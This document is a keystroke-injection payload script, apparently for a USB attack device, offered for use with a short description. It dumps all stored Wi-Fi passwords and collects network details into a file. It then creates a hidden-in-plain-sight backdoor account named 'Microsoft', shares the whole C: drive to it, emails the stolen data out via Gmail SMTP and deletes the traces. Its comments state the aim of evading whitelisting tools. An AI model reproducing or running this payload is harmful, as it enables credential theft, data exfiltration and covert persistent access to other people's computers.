This simple script will grab all of the wifi passwords, external IP address, LAN address, and hostname of the target device and e-mail it to an address of your choice. I recommend you use a Gmail address for this. I have not had luck with Yahoo, Hotmail, etc... It then creates a user called Microsoft, and shares C:\ out to the new user. My goal …

payload_data_exfiltration_backdoor.txt

REM:***************************************************
Rem:# Backdoor - Data Exfiltration
Rem:# Credit goes to Crumb93 and BrainEater from the Hak5 forums for the Wifi Password one liner
REM:This simple script will grab all of the wifi passwords, external IP address, LAN address,
REM:and hostname of the target device and e-mail it to an address of your choice.
REM:I recommend you use a Gmail address for this. I have not had luck with Yahoo, Hotmail, etc...
REM:It then creates a user called Microsoft, and shares C:\ out to the new user.
REM:My goal here was to use one liners to prevent this from being picked up by whitelisting
REM:applications (no .bat, .exe, etc...)
REM:***************************************************
CustomDelay:1000
Press:131+100
CustomDelay:450
Press:131+114
CustomDelay:450
Print:powershell Start-Process powershell -Verb runAs
CustomDelay:30
Press:176
CustomDelay:500
Press:130+121
CustomDelay:1000
Rem:***************************************************
Rem:# We're going to grab all wifi passwords
Rem:***************************************************
Print:(netsh wlan show profiles) | Select-String \"\\:(.+)$\" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=\"$name\" key=clear)}  | Select-String \"Key Content\\W+\\:(.+)$\" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize > C:\\Information.txt
Press:176
CustomDelay:500
Rem:***************************************************
Rem:# Now we'll grab Network Information (Local IP, Public IP, Hostname)
Rem:***************************************************
Print:$command = {hostname; Get-NetIpaddress | Where PrefixOrigin -EQ DHCP; Invoke-RestMethod http://ipinfo.io/json | Select -exp ip}
Press:176
CustomDelay:60
Print:$command.InvokeReturnAsIs() | Out-File C:\\Information.txt -Append
Press:176
CustomDelay:400
Rem:***************************************************
Rem:# We're going to add a user
Rem:***************************************************
Print:NET USER Microsoft \"l33t\" /ADD
Press:176
CustomDelay:100
Rem:***************************************************
Rem:# Now we're going to share the C:\ drive out
Rem:***************************************************
Print:New-SmbShare -Name \"Microsoft\" -Path \"C:\\\" -FullAccess \"Microsoft\"
Press:176
CustomDelay:100
Rem:***************************************************
Rem:# Let's e-mail ourselves and clean up
Rem:***************************************************
CustomDelay:1000
Print:$SMTPServer = 'smtp.gmail.com'
Press:176
Print:$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
Press:176
Print:$SMTPInfo.EnableSSL = $true
Press:176
Print:$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('EMAILHERE', 'PASSWORDHERE!')
Press:176
Print:$ReportEmail = New-Object System.Net.Mail.MailMessage
Press:176
Print:$ReportEmail.From = 'EMAILHERE'
Press:176
Print:$ReportEmail.To.Add('EMAILHERE')
Press:176
Print:$ReportEmail.Subject = 'Hello from the duck'
Press:176
Print:$ReportEmail.Body = (Get-Content C:\\Information.txt | out-string)
Press:176
Print:$SMTPInfo.Send($ReportEmail)
Press:176
CustomDelay:100
Rem:***************************************************
Rem:# Cleanup
Rem:***************************************************
Print:del C:\\Information.txt
Press:176
Print:exit
Press:176